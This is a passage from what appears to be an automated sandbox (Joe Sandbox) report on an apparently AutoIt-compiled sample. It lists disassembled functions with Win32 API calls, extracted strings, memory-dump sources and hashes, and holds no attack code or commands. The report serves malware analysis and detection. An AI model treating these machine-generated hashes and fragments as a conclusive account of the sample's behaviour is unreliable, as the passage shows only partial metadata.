                                                  • Opcode Fuzzy Hash: 9b56e07fab8e711d429f60e62181863e90be01b60b9c6f969f8bf44c87fc24e3
                                                  • Instruction Fuzzy Hash: 7831A236944209E6DB14FA64CD83FEE77B4FF14758F60012AB441F15D5EFA1AE04CA52
                                                  Function 008DC4C1 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadIconW.USER32(00000063), ref: 008DC4D4
                                                  • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 008DC4E6
                                                  • SetWindowTextW.USER32(?,?), ref: 008DC4FD
                                                  • GetDlgItem.USER32(?,000003EA), ref: 008DC512
                                                  • SetWindowTextW.USER32(00000000,?), ref: 008DC518
                                                  • GetDlgItem.USER32(?,000003E9), ref: 008DC528
                                                  • SetWindowTextW.USER32(00000000,?), ref: 008DC52E
                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 008DC54F
                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 008DC569
                                                  • GetWindowRect.USER32(?,?), ref: 008DC572
                                                  • SetWindowTextW.USER32(?,?), ref: 008DC5DD
                                                  • GetDesktopWindow.USER32 ref: 008DC5E3
                                                  • GetWindowRect.USER32(00000000), ref: 008DC5EA
                                                  • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 008DC636
                                                  • GetClientRect.USER32(?,?), ref: 008DC643
                                                  • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 008DC668
                                                  • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 008DC693
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                  • String ID:
                                                  • API String ID: 3869813825-0
                                                  • Opcode ID: 1c24ee73453f9ae533bf0ced183e558546911be89e29a0e7a412979fe0b21c75
                                                  • Instruction ID: 3e1698d8fcc4a92b46c806ad81f428a6fd88cc09e9944696e903430285d018d5
                                                  • Opcode Fuzzy Hash: 1c24ee73453f9ae533bf0ced183e558546911be89e29a0e7a412979fe0b21c75
                                                  • Instruction Fuzzy Hash: 20516E7190070AAFDB20DFA8DD85B6EBBF5FF04705F004A29E686E26A0C775E904DB50
                                                  Function 0090A428 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _memset.LIBCMT ref: 0090A4C8
                                                  • DestroyWindow.USER32(?), ref: 0090A542
                                                    • Part of subcall function 00887D2C: _memmove.LIBCMT ref: 00887D66
                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0090A5BC
                                                  • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0090A5DE
                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0090A5F1
                                                  • DestroyWindow.USER32(00000000), ref: 0090A613
                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00880000,00000000), ref: 0090A64A
                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0090A663
                                                  • GetDesktopWindow.USER32 ref: 0090A67C
                                                  • GetWindowRect.USER32(00000000), ref: 0090A683
                                                  • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0090A69B
                                                  • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0090A6B3
                                                    • Part of subcall function 008825DB: GetWindowLongW.USER32(?,000000EB), ref: 008825EC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                  • String ID: 0$tooltips_class32
                                                  • API String ID: 1297703922-3619404913
                                                  • Opcode ID: a26b37ac315b4ce7b22cbbba19c0888497aa926eedc4e47861e643298db2ca1f
                                                  • Instruction ID: fe9d15dacaf969aafb57446fc33cd2e735bbf38ab3660b1a37169c15114ce4de
                                                  • Opcode Fuzzy Hash: a26b37ac315b4ce7b22cbbba19c0888497aa926eedc4e47861e643298db2ca1f
                                                  • Instruction Fuzzy Hash: 6A718671154305AFD720CF28CC49F6A7BFAFB89304F080928F985872A1C772A942DB92
                                                  Function 00904619 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CharUpperBuffW.USER32(?,?), ref: 009046AB
                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 009046F6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: BuffCharMessageSendUpper
                                                  • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                  • API String ID: 3974292440-4258414348
                                                  • Opcode ID: 7645656e9a1e9679da0afa32cf0e558f36c1786532e13fcfa97f64be0e9487a6
                                                  • Instruction ID: 6669cd6ce9d985eb403c2165fa2e883931a9ac38df2b99ed7f50754458a9b1bf
                                                  • Opcode Fuzzy Hash: 7645656e9a1e9679da0afa32cf0e558f36c1786532e13fcfa97f64be0e9487a6
                                                  • Instruction Fuzzy Hash: 78917DB42043019FCB14EF14C891A6AB7E5FF85314F04896DF9969B7A2DB35ED06CB82
                                                  Function 0090BAB8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0090BB6E
                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00909431), ref: 0090BBCA
                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0090BC03
                                                  • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0090BC46
                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0090BC7D
                                                  • FreeLibrary.KERNEL32(?), ref: 0090BC89
                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0090BC99
                                                  • DestroyCursor.USER32(?), ref: 0090BCA8
                                                  • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0090BCC5
                                                  • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0090BCD1
                                                    • Part of subcall function 008A313D: __wcsicmp_l.LIBCMT ref: 008A31C6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
                                                  • String ID: .dll$.exe$.icl
                                                  • API String ID: 3907162815-1154884017
                                                  • Opcode ID: 43a8ac21611cfaac069e37e6dbbf6cc77a7f2962d2c692407bcaeaa62d8e00c1
                                                  • Instruction ID: 7308d472fe7bce1d653f7ed9369d64b3b5599c53ea9ccdeb1371d8ce4e96ecd8
                                                  • Opcode Fuzzy Hash: 43a8ac21611cfaac069e37e6dbbf6cc77a7f2962d2c692407bcaeaa62d8e00c1
                                                  • Instruction Fuzzy Hash: 8261CD72600229BEEB24DF68CC85FBE77ACFB08710F104619F955D61D1DB74AA90DBA0
                                                  Function 008EA5BD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00889997: __itow.LIBCMT ref: 008899C2
                                                    • Part of subcall function 00889997: __swprintf.LIBCMT ref: 00889A0C
                                                  • CharLowerBuffW.USER32(?,?), ref: 008EA636
                                                  • GetDriveTypeW.KERNEL32 ref: 008EA683
                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 008EA6CB
                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 008EA702
                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 008EA730
                                                    • Part of subcall function 00887D2C: _memmove.LIBCMT ref: 00887D66
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                  • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                  • API String ID: 2698844021-4113822522
                                                  • Opcode ID: 9916dfe9c67676ad903076892b0ed19ddc40dc4dcd477cc5d697d4c9c7912cb5
                                                  • Instruction ID: e47aab54268df5824340bd325016f92aea3914a826a74a2f2c52f9e32fca1d56
                                                  • Opcode Fuzzy Hash: 9916dfe9c67676ad903076892b0ed19ddc40dc4dcd477cc5d697d4c9c7912cb5
                                                  • Instruction Fuzzy Hash: 495126751083049FC714EF29C89186AB7F8FF99718F14496CF896972A1DB31EE0ACB52
                                                  Function 008EA45A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 008EA47A
                                                  • __swprintf.LIBCMT ref: 008EA49C
                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 008EA4D9
                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 008EA4FE
                                                  • _memset.LIBCMT ref: 008EA51D
                                                  • _wcsncpy.LIBCMT ref: 008EA559
                                                  • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 008EA58E
                                                  • CloseHandle.KERNEL32(00000000), ref: 008EA599
                                                  • RemoveDirectoryW.KERNEL32(?), ref: 008EA5A2
                                                  • CloseHandle.KERNEL32(00000000), ref: 008EA5AC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                  • String ID: :$\$\??\%s
                                                  • API String ID: 2733774712-3457252023
                                                  • Opcode ID: 7c03e4360233f1078b93bc733f3471d7e549e3e79374c0b4e6e9dd2d718c6b5e
                                                  • Instruction ID: 7f1bc0f69f25eacebe78f334856fa79a90ba89ea6eace7a1b6efba11800aceb9
                                                  • Opcode Fuzzy Hash: 7c03e4360233f1078b93bc733f3471d7e549e3e79374c0b4e6e9dd2d718c6b5e
                                                  • Instruction Fuzzy Hash: EC319DB1504249AADB20DFA5DC49FAB77BCFF89B41F1040B6FA08D6160E770A7448B25
                                                  Function 008D83F4 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 008D874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 008D8766
                                                    • Part of subcall function 008D874A: GetLastError.KERNEL32(?,008D822A,?,?,?), ref: 008D8770
                                                    • Part of subcall function 008D874A: GetProcessHeap.KERNEL32(00000008,?,?,008D822A,?,?,?), ref: 008D877F
                                                    • Part of subcall function 008D874A: RtlAllocateHeap.NTDLL(00000000,?,008D822A), ref: 008D8786
                                                    • Part of subcall function 008D874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 008D879D
                                                    • Part of subcall function 008D87E7: GetProcessHeap.KERNEL32(00000008,008D8240,00000000,00000000,?,008D8240,?), ref: 008D87F3
                                                    • Part of subcall function 008D87E7: RtlAllocateHeap.NTDLL(00000000,?,008D8240), ref: 008D87FA
                                                    • Part of subcall function 008D87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,008D8240,?), ref: 008D880B
                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 008D8458
                                                  • _memset.LIBCMT ref: 008D846D
                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 008D848C
                                                  • GetLengthSid.ADVAPI32(?), ref: 008D849D
                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 008D84DA
                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 008D84F6
                                                  • GetLengthSid.ADVAPI32(?), ref: 008D8513
                                                  • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 008D8522
                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 008D8529
                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 008D854A
                                                  • CopySid.ADVAPI32(00000000), ref: 008D8551
                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 008D8582
                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 008D85A8
                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 008D85BC
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                  • String ID:
                                                  • API String ID: 2347767575-0
                                                  • Opcode ID: 2ed83199f7706a865d0bb99278cae436641b4e4c595610b3ef91f3fe84d854d5
                                                  • Instruction ID: 1394f4c043c1f23bf4a87e07d61ea07638d899ea275ec31f9a8e6c7030f6006e
                                                  • Opcode Fuzzy Hash: 2ed83199f7706a865d0bb99278cae436641b4e4c595610b3ef91f3fe84d854d5
                                                  • Instruction Fuzzy Hash: 6961297190020AEFDF10DFA5EC45AAEBBB9FF04710F14826AE915E6291DB319A05DF60
                                                  Function 008F762D Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetDC.USER32(00000000), ref: 008F76A2
                                                  • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 008F76AE
                                                  • CreateCompatibleDC.GDI32(?), ref: 008F76BA
                                                  • SelectObject.GDI32(00000000,?), ref: 008F76C7
                                                  • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 008F771B
                                                  • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 008F7757
                                                  • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 008F777B
                                                  • SelectObject.GDI32(00000006,?), ref: 008F7783
                                                  • DeleteObject.GDI32(?), ref: 008F778C
                                                  • DeleteDC.GDI32(00000006), ref: 008F7793
                                                  • ReleaseDC.USER32(00000000,?), ref: 008F779E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                  • String ID: (
                                                  • API String ID: 2598888154-3887548279
                                                  • Opcode ID: c76a7b28693de240787c0c39fcd47ac4e82c3d38452ab67c7a6803002776c6b8
                                                  • Instruction ID: 14888f5f825add8324051bba3b41573a6b0a595a3337e4e0b2c714af422b3b87
                                                  • Opcode Fuzzy Hash: c76a7b28693de240787c0c39fcd47ac4e82c3d38452ab67c7a6803002776c6b8
                                                  • Instruction Fuzzy Hash: F6513975904209EFDB25CFA8CC84EAEBBB9FF48310F14842DEA4AD7210D731A9408B60
                                                  Function 008EA0B5 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 156COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadStringW.USER32(00000066,?,00000FFF,0090FB78), ref: 008EA0FC
                                                    • Part of subcall function 00887F41: _memmove.LIBCMT ref: 00887F82
                                                  • LoadStringW.USER32(?,?,00000FFF,?), ref: 008EA11E
                                                  • __swprintf.LIBCMT ref: 008EA177
                                                  • __swprintf.LIBCMT ref: 008EA190
                                                  • _wprintf.LIBCMT ref: 008EA246
                                                  • _wprintf.LIBCMT ref: 008EA264
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: LoadString__swprintf_wprintf$_memmove
                                                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                  • API String ID: 311963372-2391861430
                                                  • Opcode ID: a64dcb6f602c072c556e022bda0706f3a844862fa201c49a0a7cbb1543ee7b2d
                                                  • Instruction ID: c9b67160fddf37ddd7db693e265654679f8093fc0b0f48f4ff53ed539daec4a8
                                                  • Opcode Fuzzy Hash: a64dcb6f602c072c556e022bda0706f3a844862fa201c49a0a7cbb1543ee7b2d
                                                  • Instruction Fuzzy Hash: 15516B71904209AACF19FBA4CD86EEEB779FF05704F200165B515B20A1EB31AF58DB62
                                                  Function 00886BEC Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 008A0B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00886C6C,?,00008000), ref: 008A0BB7
                                                    • Part of subcall function 008848AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008848A1,?,?,008837C0,?), ref: 008848CE
                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00886D0D
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00886E5A
                                                    • Part of subcall function 008859CD: _wcscpy.LIBCMT ref: 00885A05
                                                    • Part of subcall function 008A387D: _iswctype.LIBCMT ref: 008A3885
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                  • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                  • API String ID: 537147316-1018226102
                                                  • Opcode ID: 15fc59d1b3afef905913062527b98aa40e72f9f4456a05416dfb15e6c1491cbe
                                                  • Instruction ID: 583ed90971c55937dfe1563b01fd77d238c972fbfe5f63c98430beb6d33d4153
                                                  • Opcode Fuzzy Hash: 15fc59d1b3afef905913062527b98aa40e72f9f4456a05416dfb15e6c1491cbe
                                                  • Instruction Fuzzy Hash: 310234311083419EC724EF28C891AAEBBE5FF99354F14492DF596D72A2DB30DA49CB43
                                                  Function 008845DF Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _memset.LIBCMT ref: 008845F9
                                                  • GetMenuItemCount.USER32(00946890), ref: 008BD7CD
                                                  • GetMenuItemCount.USER32(00946890), ref: 008BD87D
                                                  • GetCursorPos.USER32(?), ref: 008BD8C1
                                                  • SetForegroundWindow.USER32(00000000), ref: 008BD8CA
                                                  • TrackPopupMenuEx.USER32(00946890,00000000,?,00000000,00000000,00000000), ref: 008BD8DD
                                                  • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 008BD8E9
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
